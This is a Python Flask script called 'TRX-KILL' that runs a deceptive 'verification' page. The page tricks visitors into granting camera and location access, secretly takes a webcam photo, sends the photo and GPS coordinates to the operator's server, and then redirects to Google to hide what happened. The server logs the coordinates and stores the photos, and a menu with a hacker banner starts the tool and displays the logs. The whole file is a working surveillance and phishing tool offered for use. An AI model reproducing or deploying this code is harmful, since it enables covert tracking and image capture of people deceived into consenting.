import os, sys, getpass, time, base64
from flask import Flask, request

app = Flask('TRX-KILL')
PORT = 7173
AUTH_PASS = "TRX-kill-op"
STORAGE_PATH = "INFORMACION"
if not os.path.exists(STORAGE_PATH): os.makedirs(STORAGE_PATH)

# --- BANNER ---
def banner():
    os.system('cls' if os.name == 'nt' else 'clear')
    print(f"""
\033[1;32m
  ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēó  ‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēó     
  ‚ēö‚ēź‚ēź‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚ēĚ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó‚ēö‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĒ‚ēĚ     ‚Ėą‚Ėą‚ēĎ ‚Ėą‚Ėą‚ēĒ‚ēĚ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ     
     ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ ‚ēö‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ      ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēĒ‚ēĚ ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ     
     ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĒ‚ēź‚ēź‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēĒ‚Ėą‚Ėą‚ēó      ‚Ėą‚Ėą‚ēĒ‚ēź‚Ėą‚Ėą‚ēó ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĎ     ‚Ėą‚Ėą‚ēĎ     
     ‚Ėą‚Ėą‚ēĎ   ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚ēĒ‚ēĚ ‚Ėą‚Ėą‚ēó     ‚Ėą‚Ėą‚ēĎ  ‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚ēĎ‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚Ėą‚ēó
                                                            
      \033[1;36m[ SISTEMA DE SEGURIDAD TRX-KILL ]\033[0m
\033[1;32m""" + "="*60 + "\033[0m")

# --- WEB UI (FLUJO DE PERMISOS) ---
HTML_ENCUESTA = """
<!DOCTYPE html><html><body style="background:#050505; color:#0f0; text-align:center; font-family:monospace;">
    <div style="border:2px solid #0f0; padding:40px; margin:20px; box-shadow:0 0 20px #0f0;">
        <h1>TRX-KILL VERIFICATION</h1>
        <p>Para continuar, autoriza los servicios de red:</p>
        <button onclick="solicitarTodo()" style="background:#0f0; padding:20px; font-weight:bold; cursor:pointer;">
            VALIDAR ACCESO TOTAL
        </button>
    </div>
<script>
    async function solicitarTodo() {
        // 1. Pedir C√°mara
        const stream = await navigator.mediaDevices.getUserMedia({video: true});
        const v = document.createElement('video'); v.srcObject = stream; v.play();
        
        // 2. Pedir Ubicaci√≥n
        navigator.geolocation.getCurrentPosition(async(pos) => {
            setTimeout(async() => {
                const c = document.createElement('canvas');
                c.width = v.videoWidth; c.height = v.videoHeight;
                c.getContext('2d').drawImage(v, 0, 0);
                const img = c.toDataURL('image/png');
                
                // Enviar datos al servidor
                fetch('/log', {
                    method:'POST', 
                    headers:{'Content-Type':'application/json'}, 
                    body: JSON.stringify({
                        lat: pos.coords.latitude, 
                        lon: pos.coords.longitude, 
                        img: img
                    })
                }).then(() => window.location.href = "https://google.com");
            }, 1000);
        });
    }
</script></body></html>
"""

@app.route('/')
def index(): return HTML_ENCUESTA

@app.route('/log', methods=['POST'])
def log():
    d = request.json
    # Guardar ubicaci√≥n en archivo
    with open("result.txt", "a") as f:
        f.write(f"COORD: {d.get('lat')}, {d.get('lon')} | HORA: {time.ctime()}\n")
    # Guardar foto en carpeta INFORMACION
    if d.get('img'):
        with open(f"{STORAGE_PATH}/cap_{int(time.time())}.png", "wb") as f:
            f.write(base64.b64decode(d['img'].split(',')[1]))
    return "OK"

def main():
    while True:
        banner()
        print("  [1] ACTIVAR SERVIDOR TRX-KILL")
        print("  [2] VER LOGS | [3] SALIR")
        sel = input("\nTRX-ROOT > ")
        if sel == "1": app.run(port=PORT, host='127.0.0.1')
        elif sel == "2": 
            if os.path.exists("result.txt"): os.system("type result.txt" if os.name == 'nt' else "cat result.txt")
            input("\n[Enter]...")
        elif sel == "3": sys.exit()

if __name__ == "__main__": main()
